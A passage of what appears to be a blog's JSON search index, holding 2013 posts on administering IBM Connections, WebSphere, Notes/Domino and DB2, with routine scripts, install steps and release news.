this too? How? \u003ca href=\"#you-want-this-too-how\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"requirements\"\u003eRequirements \u003ca href=\"#requirements\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLinux VM (e.g. \u003ca href=\"http://www.knoppix.org/\" target=\"_blank\"\u003eKnoppix \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or other Live Linux)\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-07-15-create-a-printable-and-portable-connections-product-docu/","title":"Create a printable and portable Connections Product Documentation"},{"body":"Because of a delay of some hours on my flight back from Social Connections V on saturday, i had time to rewrite the jython script for backing up and restore security roles in WebSphere Application Server.\nI updated the master branch on GitHub , which now contains a db2 initscript and the two new scripts securityrolebackup.py and securityrolerestore.py !\nYou can call the scripts through wsadmin.sh|bat and they do following.\nsecurityrolebackup.sh cd $WAS_HOME/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username admin -password password -f \u0026#34;path/securityrolebackup.sh\u0026#34; \u0026#34;../temp\u0026#34; This will save the security roles for each installed application to $WAS_HOME/profiles/Dmgr01/temp to single files named: Application.txt.\nsecurityrolerestore.sh cd $WAS_HOME/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username admin -password password -f \u0026#34;path/securityrolerestore.sh\u0026#34; \u0026#34;../temp\u0026#34; This will take the backups from $WAS_HOME/profiles/Dmgr01/temp and restore all access rights in the single applications. All applications will be restored, but you can change the script for one or some of the applications, when you change from line 49:\n49 apps = AdminApp.list() 50 appsList = apps.split(lineSeparator) 51 # Test with some Apps: 52 # appsList = [\u0026#39;Blogs\u0026#39;,\u0026#39;Activities\u0026#39;,\u0026#39;Wikis\u0026#39;] 53 # or Single App: 54 # appsList = [\u0026#39;Blogs\u0026#39;] Comment out line 49 and 50, and remove # from line 52 to restore only some Application security roles, or remove # from 54 to restore only one!\nTipp I had several updates and cr installations with IBM Connections the last years and on some of these the updateinstaller removes my configured security roles. Now you can backup before and restore after installing a fix.\nDisclaimer These scripts are provided as is, with no warranties, and confers no rights! Please test them before using in production environments.\n","excerpt":"\u003cp\u003eBecause of a delay of some hours on my flight back from\n\u003ca href=\"http://socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n V on saturday, i had\ntime to rewrite the \u003ca href=\"http://www.jython.org\" target=\"_blank\"\u003ejython \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n script for backing up\nand restore security roles in WebSphere Application Server.\u003c/p\u003e\n\u003cp\u003eI updated the \u003ca href=\"http://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003emaster branch\non GitHub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which now contains a db2 initscript and the two new scripts\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/websphere/securityrolebackup.py\" target=\"_blank\"\u003esecurityrolebackup.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nand\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/websphere/securityrolerestore.py\" target=\"_blank\"\u003esecurityrolerestore.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n!\u003c/p\u003e\n\u003cp\u003eYou can call the scripts through wsadmin.sh|bat and they do following.\u003c/p\u003e\n\u003ch1 id=\"securityrolebackupsh\"\u003esecurityrolebackup.sh \u003ca href=\"#securityrolebackupsh\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ecd\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003e$WAS_HOME\u003c/span\u003e/profiles/Dmgr01/bin\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e./wsadmin.sh -lang jython -username admin -password password -f \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;path/securityrolebackup.sh\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;../temp\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThis will save the security roles for each installed application to\n\u003ccode\u003e$WAS_HOME/profiles/Dmgr01/temp\u003c/code\u003e to single files named: Application.txt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-07-01-soccnx-more-scripts-added/","title":"SocCnx: more scripts added"},{"body":"Today i spoke at Social Connections V User Group Meeting in Zurich. What should i say. It was a pleasure and i enjoyed it very much. Hope we can discuss more scripts the next weeks.\nSession Slides Here you can watch the session slides:\nSaving my time using scripts #soccnx #soccnxv Scripts Download You can download all scripts without warranty and on your own risk on:\nhttp://www.github.com/stoeps13/ibmcnxscripting Please download the master branch, develop and bugfix can contain not ready scripts.\nSlidedownload soccnx More Slides on http://www.slideshare.net/soccnx Update 2022: Slideshare is requesting a paid scibd account now (30 day evaluation possible). I have removed all my slides from Slideshare, you can find them under [https://stoeps.de/speaking/](Public Speaking). ","excerpt":"\u003cp\u003eToday i spoke at Social Connections V User Group Meeting in Zurich. What\nshould i say. It was a pleasure and i enjoyed it very much. Hope we can\ndiscuss more scripts the next weeks.\u003c/p\u003e\n\u003ch1 id=\"session-slides\"\u003eSession Slides \u003ca href=\"#session-slides\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eHere you can watch the session slides:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://share.stoeps.de/2013-socconv-scriptingcnx.pdf\" target=\"_blank\"\u003eSaving my time using scripts #soccnx #soccnxv \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"scripts-download\"\u003eScripts Download \u003ca href=\"#scripts-download\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eYou can download all scripts without warranty and on your own risk on:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003ehttp://www.github.com/stoeps13/ibmcnxscripting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePlease download the master branch, develop and bugfix can contain not\nready scripts.\u003c/p\u003e\n\u003ch1 id=\"slidedownload-soccnx\"\u003eSlidedownload soccnx \u003ca href=\"#slidedownload-soccnx\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMore Slides on \u003ca href=\"https://www.slideshare.net/soccnx\" target=\"_blank\"\u003ehttp://www.slideshare.net/soccnx \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cdiv class=\"alert alert-warning d-flex align-items-center border border-warning\" role=\"alert\"\u003e\n \u003ci class=\"las la-exclamation-circle la-3x align-middle\"\u003e\u003c/i\u003e\n \u003cdiv class=\"p-2 pb-0 align-middle\"\u003e\n Update 2022: Slideshare is requesting a paid scibd account now (30 day evaluation possible). I have removed all my slides from Slideshare, you can find them under [https://stoeps.de/speaking/](Public Speaking).\n \u003c/div\u003e\n\u003c/div\u003e","ref":"https://stoeps.de/posts/2013/2013-06-29-saving-my-time-using-scripts/","title":"Saving my time using scripts – Social Connections V"},{"body":"After the online documentation assumes CR1 since one week, you can finally download CR1 on FixCentral .\nRead more at Michael Urspringer’s Blog .\n","excerpt":"\u003cp\u003eAfter the\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/xpViewCategories.xsp?lookupName=Product%20Documentation\" target=\"_blank\"\u003eonline\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n assumes CR1 since one week, you can finally download\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.5.0.0\u0026amp;platform=Windows\u0026amp;function=all\" target=\"_blank\"\u003eCR1\non FixCentral \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eRead more at\n\u003ca href=\"http://www.urspringer.de/2013/06/26/ibm-connections-4-5-cumulative-refresh-1-cr1-just-arrived/\" target=\"_blank\"\u003eMichael\nUrspringer’s Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-06-27-connections-4-5-cr1-finally-arrived/","title":"IBM Connections 4.5 CR1 finally arrived"},{"body":"You can download the version 1.3 of IBM Connections Mail in Greenhouse Catalog (Login required)!\nhttps://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026documentId=2118E657CE35A81F85257B2C0083B92D Requirements: IBM Connections 4.5 (+ mandatory iFixes – see IBM Connections support site) + IBM Connections 4.5 interim fix LO74571\nOne or more of the following:\nIBM Lotus Domino 8.5.3 FP3 or later\nIBM Domino 9.0 Social Edition\nMicrosoft Exchange 2007 SP3\nMicrosoft Exchange 2010 SP1\n","excerpt":"\u003cp\u003eYou can download the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=2118E657CE35A81F85257B2C0083B92D\" target=\"_blank\"\u003eversion\n1.3 of IBM Connections Mail \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\n\u003ca href=\"http://greenhouse.lotus.com/catalog\" target=\"_blank\"\u003eGreenhouse Catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (Login\nrequired)!\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/04/2013-04-10_20-35-42.png\" alt=\"2013 04 10 20 35 42\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=2118E657CE35A81F85257B2C0083B92D\" target=\"_blank\"\u003ehttps://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026documentId=2118E657CE35A81F85257B2C0083B92D \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"requirements\"\u003eRequirements: \u003ca href=\"#requirements\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIBM Connections 4.5 (+ mandatory iFixes – see IBM Connections support\nsite) + IBM Connections 4.5 interim fix LO74571\u003c/p\u003e\n\u003cp\u003eOne or more of the following:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Lotus Domino 8.5.3 FP3 or later\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Domino 9.0 Social Edition\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMicrosoft Exchange 2007 SP3\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMicrosoft Exchange 2010 SP1\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2013/2013-04-10-ibm-connections-mail-1-3-is-available-works-with-connections-4-5/","title":"IBM Connections Mail 1.3 is available (works with Connections 4.5)"},{"body":"IBM sent me a mail today, their logs show that i downloaded CR3 and they want to tell me, that i need one fix more, when i use Notes 9 Social Edition.\nI was really surprised and impressed.\nHere the download link for LO74465 .\n","excerpt":"\u003cp\u003eIBM sent me a mail today, their logs show that i downloaded CR3 and they\nwant to tell me, that i need one fix more, when i use Notes 9 Social\nEdition.\u003c/p\u003e\n\u003cp\u003eI was really surprised and impressed.\u003c/p\u003e\n\u003cp\u003eHere the\n\u003ca href=\"http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.0.0.0\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=4.0.0.0-IC-Multi-COMMON-CR3-LO73535-LO74465\u0026amp;includeRequisites=0\u0026amp;includeSupersedes=0\u0026amp;downloadMethod=http\u0026amp;source=fc\" target=\"_blank\"\u003edownload\nlink for LO74465 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-22-additional-fix-lo74465-for-connections-cr3-and-notes-9-social-edition/","title":"Additional fix (LO74465) for Connections CR3 and Notes 9 Social Edition"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-notes/","title":"HCL Notes"},{"body":"You find the default system requirements in the overview document: “http://www-01.ibm.com/support/docview.wss?uid=swg27007909[Index of system requirements for Notes, Domino, Domino Administrator, Domino Designer \u0026amp; Notes Traveler]“\nI’ve some interesting points. IBM Domino for Windows is available as 32 and 64 bit software, but it is only supported on Windows Server 2008 R2 and Windows Server 2012, so no 32 Bit Windows is supported!\nSo a lot of us will have to upgrade the OS first.\nSystem Requirements Notes 9.0 System Requirements Domino Administrator \u0026amp; Domino Designer 9.0 System Requirements Domino 9.0 System Requirements Notes Traveler 9.0 We got a Linux 64 Bit server the first time in a gold release. I tested it in the beta and it works without any problems.\n","excerpt":"\u003cp\u003eYou find the default system requirements in the overview document:\n“http://www-01.ibm.com/support/docview.wss?uid=swg27007909[Index of\nsystem requirements for Notes, Domino, Domino Administrator, Domino\nDesigner \u0026amp; Notes Traveler]“\u003c/p\u003e\n\u003cp\u003eI’ve some interesting points. IBM Domino for Windows is available as 32\nand 64 bit software, but it is only supported on Windows Server 2008 R2\nand Windows Server 2012, so no 32 Bit Windows is supported!\u003c/p\u003e\n\u003cp\u003eSo a lot of us will have to upgrade the OS first.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27037998\" target=\"_blank\"\u003eSystem\nRequirements Notes 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27037856\" target=\"_blank\"\u003eSystem\nRequirements Domino Administrator \u0026amp; Domino Designer 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27037859\" target=\"_blank\"\u003eSystem\nRequirements Domino 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27038193\" target=\"_blank\"\u003eSystem\nRequirements Notes Traveler 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-21-system-requirements-ibm-notes-domino-9-are-available/","title":"System Requirements IBM Notes Domino 9 are available"},{"body":"You can download the Plugins in greenhouse catalog .\nConnections Plugins 4.0 are not compatible with IBM Notes 9 Gold. It worked with the beta editions, but not with stable.\nDirect Link More Infos at Luis Benitez Blog .\n","excerpt":"\u003cp\u003eYou can download the Plugins in\n\u003ca href=\"http://greenhouse.lotus.com/catalog\" target=\"_blank\"\u003egreenhouse catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eConnections Plugins 4.0 are not compatible with IBM Notes 9 Gold. It\nworked with the beta editions, but not with stable.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=C1245802A721A20185257A9B005EFD52\u0026amp;Login\" target=\"_blank\"\u003eDirect\nLink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eMore Infos at\n\u003ca href=\"http://www.lbenitez.com/2013/03/new-ibm-connections-plug-ins-for-ibm.html\" target=\"_blank\"\u003eLuis\nBenitez Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-21-connections-plugins-4-5-for-ibm-notes-9-are-available/","title":"Connections Plugins 4.5 for IBM Notes 9 are available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/notes/","title":"Notes"},{"body":"I had a problem last week with some customizations via custom.css in IBM Connections 3.0.1.1 CR3. Communities still use the default Layout and colors.\nI found that defaultTheme.css rewrites some of my custom.css statements. I had to add the content of custom.css to the end of the xxxTheme.css (lazy but it works), that i have a consistent color and layout change. Tests with @import are not working, because @import must be the first statement of a css file and i need to add the custom.css to the end of the xxxTheme.css.\n","excerpt":"\u003cp\u003eI had a problem last week with some customizations via custom.css in IBM\nConnections 3.0.1.1 CR3. Communities still use the default Layout and\ncolors.\u003c/p\u003e\n\u003cp\u003eI found that defaultTheme.css rewrites some of my custom.css statements.\nI had to add the content of custom.css to the end of the xxxTheme.css\n(lazy but it works), that i have a consistent color and layout change.\nTests with @import are not working, because @import must be the first\nstatement of a css file and i need to add the custom.css to the end of\nthe xxxTheme.css.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-20-connections-3-customizing-custom-css-is-not-enough/","title":"Connections 3 Customizing – custom.css is not enough"},{"body":"IBM announced CR3 for IBM Connections 4.0, that’s about 800 MB new updates. Don’t forget to update your homepage database, when you didn’t install CR2 already.\nmore: http://www.ruddigkeit.net/ [ruddigkeit.net | ..\ncollaboration and more ::..].\nUpdate: CR3 needs database updates for metrics database and cognos application! Please read this technote .\n","excerpt":"\u003cp\u003eIBM announced CR3 for IBM Connections 4.0, that’s about 800 MB new\nupdates. Don’t forget to update your homepage database, when you didn’t\ninstall CR2 already.\u003c/p\u003e\n\u003cp\u003emore: \u003ca href=\"http://www.ruddigkeit.net/\" target=\"_blank\"\u003ehttp://www.ruddigkeit.net/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n[ruddigkeit.net | ..\u003cbr\u003e\ncollaboration and\nmore ::..].\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate: \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCR3 needs database updates for metrics database and cognos application!\nPlease \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21616619\" target=\"_blank\"\u003eread\nthis technote \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-19-ruddigkeit-net-ibm-connections-4-0-cr3-available/","title":"ruddigkeit.net – IBM Connections 4.0 CR3 available – update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ubuntu/","title":"Ubuntu"},{"body":"I’m really impressed of the WAS 8 installation. Install Manager can handle multiple repositories, so you can install the core package and updates in one step. That’s lots faster than installing WAS 7, Update Installer and the fixes.\nYes i know Ubuntu is unsupported for WebSphere Application Server, but i like the simple install and update process. So i use it on about 80 % of my linux testsystems and i have no problems when installing IBM Domino, WebSphere, DB2 or Connections.\nAdditional software for Ubuntu I added the following packages to Ubuntu and use x-forward for installing IM and WAS.\nRelink /bin/sh dpkg-reconfigure dash Install Firefox and SSH apt-get install firefox apt-get install openssh-server Add 32 Bit Libraries for Install Manager apt-get install libxtst6 apt-get install ia32-libs Uninstall AppArmor apt-get remove --purge apparmor* Profile Manager After WebSphere installation the profiles manager starts automatically and it WORKS! I can configure profiles on a 64 Bit Linux through it.\nService install Installing the services on Ubuntu works too with the wasservice.sh command, which fails on WAS 7.\ncd /opt/IBM/WebSphere/AppServer/bin ./wasservice.sh \\ -add Dmgr \\ -serverName dmgr \\ -profilePath /opt/IBM/WebSphere/AppServer/profiles/Dmgr01\\ -wasHome /opt/IBM/WebSphere/AppServer \\ -stopArgs \u0026#34;-username adminaccount -password password\u0026#34; ./wasservice.sh \\ -add nodeagent \\ -serverName nodeagent \\ -profilePath /opt/IBM/WebSphere/AppServer/profiles/AppSrv01 \\ -wasHome /opt/IBM/WebSphere/AppServer \\ -stopArgs \u0026#34;-username adminaccount -password password\u0026#34; I always install services for deployment manager and the nodeagents. The automatic start of my application servers i configure through the ISC and the Monitoring Policy.\nI do this, because i had several issues when starting the application servers through init or windows service and the servers work in a cluster.\nWhen you want to stop your application servers automatically on reboots, you should register a init-Skript and remove the start tasks in /etc/rcx.d for these application server services.\n","excerpt":"\u003cp\u003eI’m really impressed of the WAS 8 installation. Install Manager can\nhandle multiple repositories, so you can install the core package and\nupdates in one step. That’s lots faster than installing WAS 7, Update\nInstaller and the fixes.\u003c/p\u003e\n\u003cp\u003eYes i know Ubuntu is unsupported for WebSphere Application Server, but i\nlike the simple install and update process. So i use it on about 80 % of\nmy linux testsystems and i have no problems when installing IBM Domino,\nWebSphere, DB2 or Connections.\u003c/p\u003e\n\u003ch1 id=\"additional-software-for-ubuntu\"\u003eAdditional software for Ubuntu \u003ca href=\"#additional-software-for-ubuntu\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eI added the following packages to Ubuntu and use x-forward for\ninstalling IM and WAS.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-16-websphere-application-server-8-0-0-5-on-ubuntu-12-04-64-bit/","title":"WebSphere Application Server 8.0.0.5 on Ubuntu 12.04 64 Bit"},{"body":"I read today the requirements for IBM Connections 4.5 , which will be released on 29th of march. On point there is WebSphere Application Server V8.0.0.5 for Network Deployment.\nWebSphere Application Server V8 must be installed through Install Manager, so you have to download 4 packages for the server core and 4 packages for supplements. After this the fixes for 8.0.0.5, what do you think you many data will it be?\nYou will download more than 10 GB of Software only for WebSphere Installation! 6.x GB for V8 and about 5 GB for fixes.\nHere the Software (with some DB2 stuff):\n","excerpt":"\u003cp\u003eI read today the\n\u003ca href=\"http://pic.dhe.ibm.com/infocenter/prodguid/v1r0/clarity-reports/report/html/prereqsForProduct?deliverableId=1316596301949\" target=\"_blank\"\u003erequirements\nfor IBM Connections 4.5 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which will be released on 29th of march. On\npoint there is WebSphere Application Server V8.0.0.5 for Network\nDeployment.\u003c/p\u003e\n\u003cp\u003eWebSphere Application Server V8 must be installed through Install\nManager, so you have to download 4 packages for the server core and 4\npackages for supplements. After this the fixes for 8.0.0.5, what do you\nthink you many data will it be?\u003c/p\u003e\n\u003cp\u003eYou will download more than 10 GB of Software only for WebSphere\nInstallation! 6.x GB for V8 and about 5 GB for fixes.\u003c/p\u003e\n\u003cp\u003eHere the Software (with some DB2 stuff):\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-15-started-websphere-8-download/","title":"Started WebSphere 8 Download"},{"body":"The Default Page of Wikis shows some content for our users to offer them better work experience, but in some companies it would be good to change this text or use only one language. Content of this welcome page is set in the default language of the user who creates the wiki.\nI found the properties File for this text area in {WAS_Root}/profiles/AppSrv01/installedApps/{cellname}/Wikis.ear When you unzip the file share.services.jar, you get the path com/ibm/lconn/share/services/handlers/wiki/nls/ and there the properties-files for wikis (WikiWelcomePageMessages.properties).\nTo change the values for english, you create a file named com.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages.properties in {Connections Shared Directory}/customization/strings/\nHere you define:\nWELCOME_MESSAGE_HTML=Your Default Wiki Welcome Text WELCOME_MESSAGE_COMMUNITY_HTML=Your Default Community Wiki Welcome Text The string can contain html markup.\nIf you want to change this in additional languages, you have to prepare files with following name: com.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages_{LanguageCode}.properties\n","excerpt":"\u003cp\u003eThe Default Page of Wikis shows some content for our users to offer them\nbetter work experience, but in some companies it would be good to change\nthis text or use only one language. Content of this welcome page is set\nin the default language of the user who creates the wiki.\u003c/p\u003e\n\u003cp\u003eI found the properties File for this text area in\n\u003ccode\u003e{WAS_Root}/profiles/AppSrv01/installedApps/{cellname}/Wikis.ear\u003c/code\u003e When\nyou unzip the file \u003ccode\u003eshare.services.jar\u003c/code\u003e, you get the path\n\u003ccode\u003ecom/ibm/lconn/share/services/handlers/wiki/nls/\u003c/code\u003e and there the\nproperties-files for wikis (\u003ccode\u003eWikiWelcomePageMessages.properties\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eTo change the values for english, you create a file named\n\u003ccode\u003ecom.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages.properties\u003c/code\u003e\nin \u003ccode\u003e{Connections Shared Directory}/customization/strings/\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eHere you define:\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-12-customizing-connections-4-wikis-default-page/","title":"Customizing Connections 4 Wikis Default (Welcome) Page"},{"body":"Connections 4.5 will be available on 29th of march.\nmore via stephankopp.net ","excerpt":"\u003cp\u003eConnections 4.5 will be available on 29th of march.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://stephankopp.net/2013/03/12/ibm-notesdomino-9-0-will-be-available-on-21st-of-march/\" target=\"_blank\"\u003emore \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://stephankopp.net\" target=\"_blank\"\u003estephankopp.net \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-12-stephankopp-net-ibm-notesdomino-9-0-will-be-available-on-21st-of-march-and-connection-4-5-on-march-29/","title":"StephanKopp.net: IBM Notes/Domino 9.0 will be available on 21st of March and Connection 4.5 on March 29"},{"body":"After skripting jdbc and j2ee on WebSphere i was interested to fasten the DB2 configuration after a Connections installation.\nThere are two ways to get valid source xml-Files for automatic maintenance in DB2. I use automatic maintenance, because i can set a maximum backup time and how many dumps of one database should be stored. DB2 deletes old backups (which i have in a filebackup each night) automatically.\nYou can’t script this settings directly, IBM provides two system calls for this: sysproc.automaint_set_policyfile and sysproc.automaint_set_policy.\nI use the file variant here, because i think it easier to handle files than blob content.\nSample Files In /opt/ibm/db2/v9.7/samples/automaintcfg you can find example files for all settings within automatic maintenance.\nYou can edit them and then put them to INSTANCE_ROOT/sqllib/tmp (on Linux|AIX /home/db2inst1/sqllib/tmp).\nThe xml-Files must have read/write rights for db2fenc1 user or db2iadm group!\nExport settings from db2 You can setup one of the connections databases for automatic maintenance (timeperiods, backup path, and so on). These settings can be done through db2cc or DB2 Data Studio. After providing all needed parameters you can export these settings through db2 commandline interface.\nconnect to homepage call sysproc.automaint_get_policyfile(\u0026#39;AUTO_BACKUP\u0026#39;,\u0026#39;DB2AutoBackupPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;AUTO_RUNSTATS\u0026#39;,\u0026#39;DB2AutoRunStatsPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;AUTO_REORG\u0026#39;,\u0026#39;DB2AutoReorgPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;MAINTENANCE_WINDOW\u0026#39;,\u0026#39;DB2AutoMaintenancePolicy.xml\u0026#39;) The files get automatically stored to INSTANCE_ROOT/sqllib/tmp.\nSet automatic maintenance through script I created a script with following code (e.g. setbackup.sql):\nconnect to peopledb; update db cfg using AUTO_MAINT ON; update db cfg using AUTO_DB_BACKUP ON; update db cfg using AUTO_TBL_MAINT ON; update db cfg using AUTO_RUNSTATS ON; update db cfg using AUTO_STATS_PROF ON; update db cfg using AUTO_PROF_UPD ON; update db cfg using AUTO_REORG ON; call 